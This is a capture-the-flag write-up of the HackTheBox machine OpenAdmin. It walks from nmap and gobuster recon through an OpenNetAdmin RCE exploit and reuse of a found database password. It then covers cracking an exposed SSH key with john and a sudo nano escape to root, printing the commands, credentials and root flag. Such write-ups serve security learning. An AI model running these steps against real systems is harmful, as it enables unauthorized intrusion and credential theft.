[HTB Writeup]: Openadmin HackTheBox Challenge
Disclaimer: this is an old post that was finished some time ago (February 2020), but due to things (I forgot about the machine retiring) I’m publishing it only now.
It’s been a looooong time…
… since I’ve written something here. This place is not dead yet. I had a really tight schedule with my security job, school, CTFs and organizing PozSec meetups, soooo it was really hard to start blogging again. I’m still learning, and some topics I want to cover in depth require time. But here I am with a pretty easy challenge from HTB. It is my first HTB writeup and I couldn’t wait to publish it, but I had to wait for the embargo to expire.
Recon
First things first. The box is located at the 10.10.10.171 address. I’ve added an entry to /etc/hosts to resolve it by domain name.
10.10.10.171 openadmin.htb
Nmap scan didn’t show anything interesting:
sudo nmap -T aggressive -sC -sV 10.10.10.171
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-21 01:32 CET
Nmap scan report for openadmin.htb (10.10.10.171)
Host is up (0.053s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.60 seconds
Recon with the -p- option gave nothing new: a standard ssh service and a single http server running on port 80. HTB is not about bruteforcing, so without an initial foothold, trying to leak users with the OpenSSH user enumeration exploit (more on that below) is rather a bad idea. The next part of the recon was running gobuster on the / directory.
gobuster dir -u 10.10.10.171 -w wordlists/common.txt -t 30 -x .asp,.aspx,.bat,.c,.cfm,.cgi,.com,.dll,.exe,.htm,.html,.inc,.jhtml,.jsa,.jsp,.log,.mdb,.nsf,.php,.phtml,.pl,.reg,.sh,.shtml,.sql,.txt,.xml
The tool has found some pages on the host:
artwork
music
sierra
And some forbidden_403_not_so_interesting_stuff (looked like rules to redirect all .htaccess etc.). A recursive search on the directories found gave some files, but nothing particularly important.
gobuster dir -u 10.10.10.171/artwork -w wordlists/common.txt -t 30 -x .asp,.aspx,.bat,.c,.cfm,.cgi,.com,.dll,.exe,.htm,.html,.inc,.jhtml,.jsa,.jsp,.log,.mdb,.nsf,.php,.phtml,.pl,.reg,.sh,.shtml,.sql,.txt,
gobuster dir -u 10.10.10.171/music -w wordlists/common.txt -t 30 -x .asp,.aspx,.bat,.c,.cfm,.cgi,.com,.dll,.exe,.htm,.html,.inc,.jhtml,.jsa,.jsp,.log,.mdb,.nsf,.php,.phtml,.pl,.reg,.sh,.shtml,.sql,.txt,.xml
gobuster dir -u 10.10.10.171/sierra -w wordlists/common.txt -t 30 -x .asp,.aspx,.bat,.c,.cfm,.cgi,.com,.dll,.exe,.htm,.html,.inc,.jhtml,.jsa,.jsp,.log,.mdb,.nsf,.php,.phtml,.pl,.reg,.sh,.shtml,.sql,.txt,.xml
At this point, after analysing the content of the hosted files, I had a really hard time. Nothing to see here, but there must have been something…
In the meantime I’ve tried to enumerate ssh users using CVE-2018-15473, since the box runs OpenSSH 7.6p1, which is affected, but that was a dead end with false positives only. After changing the method in msf no results were returned. Another tool failed as well.
Stuck
Sometimes during a pentest it is really nice to have a collection of all hyperlinks on the website; there will probably be something interesting in it. I’ve written a simple and really fast crawler to achieve that. Here is the most important part of the generated report.
[...]
=== REPORT ===
=== IN WEBSITE LINKS ===
+-----------------------------------------+-----------------------------------------+
| source | target |
+=========================================+=========================================+
| http://10.10.10.171/music/contact.html | http://10.10.10.171/music/blog.html |
+-----------------------------------------+-----------------------------------------+
| http://10.10.10.171/music/playlist.html | http://10.10.10.171/music/blog.html |
+-----------------------------------------+-----------------------------------------+
| http://10.10.10.171/music/artist.html | http://10.10.10.171/music/category.html |
+-----------------------------------------+-----------------------------------------+
| http://10.10.10.171/music/index.html | http://10.10.10.171/ona | <- this entry
+-----------------------------------------+-----------------------------------------+
[...]
It’s really a pity that this wasn’t found by the popular dirbusting wordlists. But well, yeah. Back on track.
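A minimal version of such a crawler, as an added example (not the author’s tool): it walks a site breadth-first, resolves relative links, stays on the starting host and returns (source, target) pairs like the table in the report above. The SAMPLE_SITE dict is constructed here to stand in for HTTP GET, so the script runs offline.

```python
from collections import deque
from html.parser import HTMLParser
from urllib.parse import urldefrag, urljoin, urlsplit

class LinkExtractor(HTMLParser):
    ATTRS = {"a": "href", "link": "href", "script": "src", "img": "src", "iframe": "src"}

    def __init__(self):
        super().__init__()
        self.links = []  # raw href/src values, in document order

    def handle_starttag(self, tag, attrs):
        wanted = self.ATTRS.get(tag)
        for name, value in attrs:
            if name == wanted and value:
                self.links.append(value)

def crawl(start_url, fetch, max_pages=500):
    """Breadth-first crawl that never leaves start_url's host.
    fetch(url) returns the body as text or None; returns sorted same-host (source, target) pairs."""
    host = urlsplit(start_url).netloc
    seen, queue, edges = {start_url}, deque([start_url]), set()
    while queue:
        page = queue.popleft()
        body = fetch(page)
        if body is None:
            continue
        parser = LinkExtractor()
        parser.feed(body)
        for raw in parser.links:
            target, _ = urldefrag(urljoin(page, raw))  # resolve relative links, drop #fragment
            if urlsplit(target).netloc != host:
                continue  # external link: not an "in website" edge
            edges.add((page, target))
            if target not in seen and len(seen) < max_pages:
                seen.add(target)
                queue.append(target)
    return sorted(edges)

# Constructed sample site (not the real box): the only reference to /ona hides in music/index.html.
SAMPLE_SITE = {
    "http://10.10.10.171/": '<a href="/music/index.html">music</a> <a href="/artwork/">art</a>',
    "http://10.10.10.171/music/index.html": '<a href="blog.html">blog</a> <a href="/ona">ona</a> <a href="https://example.com/">ext</a>',
    "http://10.10.10.171/music/blog.html": '<a href="index.html#top">home</a>',
    "http://10.10.10.171/artwork/": '<img src="logo.png">',
}

def crawl_sample():
    # A dict lookup plays the role of HTTP GET; unknown URLs (like /ona) simply return None.
    return crawl("http://10.10.10.171/", SAMPLE_SITE.get)
```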
Local shell
/ona redirected to OpenNetAdmin 18.1.1, a tool for managing the inventory of your network. This version is vulnerable to RCE and a PoC was published. Unfortunately the .sh script didn’t work for me. Finally I found the right exploit, which gave a really simple shell as the www-data user.
> python ona-rce.py exploit http://10.10.10.171/ona
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] Connected Successfully!
sh$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh$
Poking around
The next stage of the enumeration involved looking around to obtain a real shell, probably ssh to the machine. At this point I decided not to create any more complicated shell, for example with a python tty. I just looked around for available stuff.
sh$ ls -la
total 88
drwxrwxr-x 10 www-data www-data 4096 Feb 20 20:33 .
drwxr-x--- 7 www-data www-data 4096 Nov 21 18:23 ..
-rw-rw-r-- 1 www-data www-data 1970 Jan 3 2018 .htaccess.example
-rw-r--r-- 1 www-data www-data 16384 Feb 20 20:33 .login.php.swp
drwxrwxr-x 2 www-data www-data 4096 Jan 3 2018 config
-rw-rw-r-- 1 www-data www-data 1949 Jan 3 2018 config_dnld.php
-rw-rw-r-- 1 www-data www-data 4160 Jan 3 2018 dcm.php
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 images
drwxrwxr-x 9 www-data www-data 4096 Jan 3 2018 include
-rw-rw-r-- 1 www-data www-data 1999 Jan 3 2018 index.php
drwxrwxr-x 5 www-data www-data 4096 Jan 3 2018 local
-rw-rw-r-- 1 www-data www-data 4526 Jan 3 2018 login.php
-rw-rw-r-- 1 www-data www-data 1106 Jan 3 2018 logout.php
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 modules
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 plugins
drwxrwxr-x 2 www-data www-data 4096 Jan 3 2018 winc
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 workspace_plugins
Grepping the directories for a password led me to the local/config directory.
sh$ ls -la local
total 20
drwxrwxr-x 5 www-data www-data 4096 Jan 3 2018 .
drwxrwxr-x 10 www-data www-data 4096 Feb 20 20:33 ..
drwxrwxr-x 2 www-data www-data 4096 Nov 21 16:51 config
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 nmap_scans
drwxrwxr-x 2 www-data www-data 4096 Jan 3 2018 plugins
With database_settings.inc.php in it.
sh$ ls -la local/config
total 16
drwxrwxr-x 2 www-data www-data 4096 Nov 21 16:51 .
drwxrwxr-x 5 www-data www-data 4096 Jan 3 2018 ..
-rw-r--r-- 1 www-data www-data 426 Nov 21 16:51 database_settings.inc.php
-rw-rw-r-- 1 www-data www-data 1201 Jan 3 2018 motd.txt.example
-rw-r--r-- 1 www-data www-data 0 Nov 21 16:28 run_installer
Further look at that file gave some really interesting results.
sh$ cat local/config/database_settings.inc.php
MySQL creds lying on the ground.
[...]
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
[...]
))
I’ve tried listing users on the box. I did it simply by checking the home directory on the host.
sh$ ls -la /home
total 16
drwxr-xr-x 4 root root 4096 Nov 22 18:00 .
drwxr-xr-x 24 root root 4096 Nov 21 13:41 ..
drwxr-x--- 5 jimmy jimmy 4096 Nov 22 23:15 jimmy
drwxr-x--- 6 joanna joanna 4096 Nov 28 09:37 joanna
I attempted some kind of password spraying attack. I had three accounts on the host (counting root) and one password, and after a single try I managed to log in! Remember, users: never ever reuse your passwords.
ssh jimmy@10.10.10.171
jimmy@10.10.10.171's password: n1nj4W4rri0R!
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Feb 20 20:53:53 UTC 2020
System load: 0.24 Processes: 118
Usage of /: 50.8% of 7.81GB Users logged in: 0
Memory usage: 27% IP address for ens160: 10.10.10.171
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Last login: Thu Jan 2 20:50:03 2020 from 10.10.14.3
jimmy@openadmin:~$ ls
Looked like the first shell had been spawned, but no user.txt file was there. I needed to look deeper.
Privilege escalation
It was time to do some priv esc. First to obtain access to joanna’s home directory, then root.
Horizontal
In general there are two types of privilege escalation. Horizontal means taking over other users that are not power users like root. They may still belong to different groups and have read and write rights to some interesting locations. My obvious choice was to target joanna’s account.
jimmy@openadmin:~$ ls -la
total 32
drwxr-x--- 5 jimmy jimmy 4096 Nov 22 23:15 .
drwxr-xr-x 4 root root 4096 Nov 22 18:00 ..
lrwxrwxrwx 1 jimmy jimmy 9 Nov 21 14:07 .bash_history -> /dev/null
-rw-r--r-- 1 jimmy jimmy 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 jimmy jimmy 3771 Apr 4 2018 .bashrc
drwx------ 2 jimmy jimmy 4096 Nov 21 13:52 .cache
drwx------ 3 jimmy jimmy 4096 Nov 21 13:52 .gnupg
drwxrwxr-x 3 jimmy jimmy 4096 Nov 22 23:15 .local
-rw-r--r-- 1 jimmy jimmy 807 Apr 4 2018 .profile
jimmy@openadmin:~$ cat .bash_history
jimmy@openadmin:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied
jimmy@openadmin:~$ sudo !!
sudo cat /etc/shadow
[sudo] password for jimmy:
jimmy is not in the sudoers file. This incident will be reported.
jimmy@openadmin:~$ w
20:54:54 up 1:59, 1 user, load average: 0.09, 0.04, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
jimmy pts/0 10.10.14.7 20:53 0.00s 0.05s 0.00s w
I ran the LinEnum.sh script but found nothing unusual. My main focus shifted to the /var/www directory. There was an internal directory exposed by the Apache server on port 52846.
jimmy@openadmin:/var$ cat /etc/apache2/sites-enabled/internal.conf
Listen 127.0.0.1:52846
<VirtualHost 127.0.0.1:52846>
ServerName internal.openadmin.htb
DocumentRoot /var/www/internal
<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
And AssignUserID was set to joanna, so with mpm-itk every request to this virtual host, including any PHP it executes, is served as joanna rather than www-data.
The directory contained three .php files, one of which was particularly interesting.
jimmy@openadmin:/var/www/internal$ ls
index.php logout.php main.php
The main.php source presented below contained a shell_exec('cat /home/joanna/.ssh/id_rsa') call. This cats (and then embeds) the private RSA key of user joanna into the visited page.
jimmy@openadmin:/var$ cat www/internal/main.php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
I requested main.php on the right port and got a pretty meaningful response: a 302 to /index.php, but since the script never calls exit after header(), PHP kept executing and the body still carried the key.
jimmy@openadmin:/var$ curl -ksi 127.0.0.1:52846/main.php
HTTP/1.1 302 Found
Date: Thu, 20 Feb 2020 21:42:28 GMT
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: PHPSESSID=uk2vqsqf0o2kmdghf9vakc87dj; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /index.php
Content-Length: 1902
Content-Type: text/html; charset=UTF-8
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D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-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
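The reason the 302 still carries the key is that header() only queues a response header; PHP keeps executing unless the script calls exit or die afterwards. The following check is an added example, not code from the box or from OpenNetAdmin: it scans PHP source for Location redirects that are not terminated, using a constructed copy of main.php and a fixed variant as input.

```python
import re

# Constructed copy of the vulnerable main.php shown above (not the project's own code).
VULNERABLE_MAIN_PHP = """<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>"""

# Same script with the redirect terminated; header() on its own never stops PHP execution.
FIXED_MAIN_PHP = VULNERABLE_MAIN_PHP.replace(
    'header("Location: /index.php"); }', 'header("Location: /index.php"); exit; }')

_COMMENT = re.compile(r"/\*.*?\*/|(?://|#)[^\n]*", re.S)  # the three PHP comment forms
_REDIRECT = re.compile(r"""header\s*\(\s*(["'])Location:.*?\1\s*\)\s*;""", re.S)
_TERMINATOR = re.compile(r"\s*(?:\}\s*;?\s*)*(?:exit|die)\b")  # closing braces may come first

def unterminated_redirects(php_source):
    """Return 1-based line numbers of Location redirects not followed by exit/die.
    Heuristic text scan, not a PHP parser: a '#' inside a string literal is treated as a comment."""
    findings = []
    for match in _REDIRECT.finditer(php_source):
        rest = _COMMENT.sub("", php_source[match.end():])  # ignore comments between the two
        if not _TERMINATOR.match(rest):
            findings.append(php_source.count("\n", 0, match.start()) + 1)
    return findings
```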
But as presented above, the private key was encrypted. There was a hint to remember the ninja password. I didn’t remember any, so I downloaded the john toolkit and the rockyou.txt dictionary for a start.
~/devp/htb/openadmin ❯ ssh2john things.key joanna.hash
~/devp/htb/openadmin ❯ john joanna.hash -wordlist=/home/rav/tools/SecLists/rockyou.txt
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas (joanna_ssh.key)
Warning: Only 1 candidate left, minimum 8 needed for performance.
1g 0:00:00:03 DONE (2020-02-20 23:59) 0.2570g/s 3686Kp/s 3686Kc/s 3686KC/s *7¡Vamos!
Session completed
Two seconds later john cracked the password: bloodninjas. I used it in combination with the key and finally logged in as joanna! Got the user.txt file, so this part of the challenge was done.
~/devp/htb/openadmin ❯ ssh -i things.key joanna@10.10.10.171
Enter passphrase for key 'things.key':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Feb 20 22:04:05 UTC 2020
System load: 0.0 Processes: 124
Usage of /: 51.2% of 7.81GB Users logged in: 1
Memory usage: 35% IP address for ens160: 10.10.10.171
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Jan 2 21:12:40 2020 from 10.10.14.3
joanna@openadmin:~$ ls -la
total 332
drwxr-x--- 6 joanna joanna 4096 Feb 20 22:22 .
drwxr-xr-x 4 root root 4096 Nov 22 18:00 ..
lrwxrwxrwx 1 joanna joanna 9 Nov 22 18:02 .bash_history -> /dev/null
-rw-r--r-- 1 joanna joanna 220 Nov 22 18:00 .bash_logout
-rw-r--r-- 1 joanna joanna 3771 Nov 22 18:00 .bashrc
drwx------ 2 joanna joanna 4096 Nov 22 22:42 .cache
drwx------ 3 joanna joanna 4096 Nov 22 22:42 .gnupg
-rwxrwxr-x 1 joanna joanna 46632 Feb 20 22:08 linenum.sh
drwxrwxr-x 3 joanna joanna 4096 Nov 22 18:53 .local
-rwxrwxr-x 1 joanna joanna 34317 Feb 20 22:09 lse.sh
-rw------- 1 joanna joanna 8 Feb 20 22:22 nano.save
-rw-r--r-- 1 joanna joanna 807 Nov 22 18:00 .profile
-rw-rw-r-- 1 joanna joanna 204173 Feb 20 22:17 report.txt-20-02-20
drwx------ 2 joanna joanna 4096 Nov 23 17:31 .ssh
-rw-rw-r-- 1 joanna joanna 33 Nov 28 09:37 user.txt
-rw------- 1 joanna joanna 1689 Feb 20 22:09 .viminfo
joanna@openadmin:~$ wc -c user.txt
33 user.txt
I uploaded the LinEnum.sh and lse.sh scripts for vertical privilege escalation. Both scripts found that user joanna can run /bin/nano /opt/priv with sudo and without a password.
Vertical
GTFOBins (this entry is specifically for nano, but there are other great ones too) is a collection of snippets for spawning shells from the many binaries available on GNU/Linux machines. This time one of the methods worked for me and allowed me to spawn a root shell.
nano
^R^X
reset; sh 1>&0 2>&0
And here is the dump of the commands used as root. I haven’t tried to create a more reliable shell, since I only wanted to grab the contents of the root.txt file.
Command to execute: reset; sh 1>&0 2>&0# whoami
rootet Help ^X Read File
# cat /root.txt M-F New Buffer
cat: /root.txt: No such file or directory
# ls
linenum.sh lse.sh nano.save report.txt-20-02-20 user.txt
# cd ~
# ls
linenum.sh lse.sh nano.save report.txt-20-02-20 user.txt
# ls /
bin cdrom etc initrd.img lib lost+found mnt proc run snap swap.img tmp var vmlinuz.old
boot dev home initrd.img.old lib64 media opt root sbin srv sys usr vmlinuz
# ls /root
root.txt
# cat /root/tx
cat: /root/tx: No such file or directory
# cat /root/root.txt
2f907ed450b361b2c2bf4e8795d5b561
# wc -l /root/root.txt
1 /root/root.txt
# wc -c /root/root.txt
33 /root/root.txt
Which was successful.
Bottom line
I’ve really enjoyed this box. The OpenAdmin challenge was a little bit tricky and all about enumeration. Nothing fancy and no binary exploitation here. But I’ve learned one more time that sometimes the provided tools are not reliable.
Thank you for reading and see ya next time!
foxtrot_charlie over and out!